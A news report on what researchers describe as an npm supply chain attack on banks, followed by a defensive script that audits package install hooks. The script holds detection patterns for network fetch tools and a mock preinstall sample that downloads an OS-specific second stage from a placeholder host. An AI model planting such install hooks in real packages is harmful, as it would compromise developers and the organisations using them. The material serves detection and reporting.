Cybersecurity researchers say they have discovered what they believe is the first open-source software supply chain attack specifically targeting the banking sector.
“These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it,” Checkmarx said in a report published last week.
“The attackers employed deceptive tactics such as creating a fake LinkedIn profile to appear credible and customized command-and-control (C2) centers for each target, exploiting legitimate services for illicit activities.”
The npm packages have since been reported and taken down. The names of the packages were not disclosed.
In the first attack, the malware author is said to have uploaded a couple of packages to the npm registry in early April 2023 by posing as an employee of the target bank. The modules came with a preinstall script to activate the infection sequence. To complete the ruse, the threat actor behind it created a fake LinkedIn profile.
Once launched, the script checked whether the host operating system was Windows, Linux, or macOS, then downloaded second-stage malware from a remote server using an Azure subdomain that incorporated the name of the bank in question.
“The attacker cleverly utilized Azure’s CDN subdomains to effectively deliver the second-stage payload,” Checkmarx researchers said. “This tactic is particularly clever because it bypasses traditional deny list methods, due to Azure’s status as a legitimate service.”
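A defender-side check for the pattern described above, added here as an example and not taken from Checkmarx or the report: it audits an npm package's lifecycle scripts for OS branching combined with a network fetch and reports the contacted host instead of matching it against a deny list, since the report notes a legitimate CDN host defeats that approach. The package name, script file and host in the sample are constructed placeholders.

```javascript
// Added example (not from the Checkmarx report): flag npm lifecycle scripts
// that branch on the host OS and fetch something from the network, the
// behaviour the report attributes to the malicious preinstall hook.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];
// Commands/APIs that pull content from the network during install.
const FETCHERS = /\b(curl|wget|Invoke-WebRequest|iwr|fetch|https?\.get|http\.request)\b/i;
// Signs the script decides what to do based on the operating system.
const OS_PROBES = /process\.platform|os\.platform\(\)|\buname\b|\$OSTYPE|\b(win32|darwin|linux)\b/i;
const URL_RE = /https?:\/\/[^\s"'`]+/gi;
const NODE_FILE = /\bnode\s+(\S+\.js)\b/;

// pkg: parsed package.json; files: { filename: contents } for scripts a hook runs.
function auditInstallScripts(pkg, files) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    // Hooks are usually one-liners like "node install.js"; inspect that file too.
    const ref = cmd.match(NODE_FILE);
    const body = ref && files && files[ref[1]] ? cmd + '\n' + files[ref[1]] : cmd;
    const hosts = (body.match(URL_RE) || []).map((u) => {
      try { return new URL(u).hostname; } catch (e) { return u; }
    });
    const fetches = FETCHERS.test(body) || hosts.length > 0;
    const probesOs = OS_PROBES.test(body);
    // A legitimate CDN host passes deny lists, so severity comes from behaviour.
    const severity = fetches && probesOs ? 'high' : fetches ? 'medium' : 'info';
    findings.push({ hook, severity, fetches, probesOs, hosts });
  }
  return findings;
}

// Constructed sample modelled on the report's description; names are placeholders.
const SAMPLE_PKG = {
  name: 'examplebank-ui-widget',
  version: '1.0.0',
  scripts: { preinstall: 'node install.js', test: 'echo ok' },
};
const SAMPLE_FILES = {
  'install.js': [
    "const https = require('https');",
    "const file = process.platform === 'win32' ? 'stage.exe' : 'stage.sh';",
    "https.get('https://stage.examplebank-cdn.invalid/' + file, () => {});",
  ].join('\n'),
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditInstallScripts(SAMPLE_PKG, SAMPLE_FILES), null, 2));
}
```

Run against a package before installing it (for example from a lockfile review step in CI), and treat any `high` finding as a reason to hold the package for manual inspection of the referenced script.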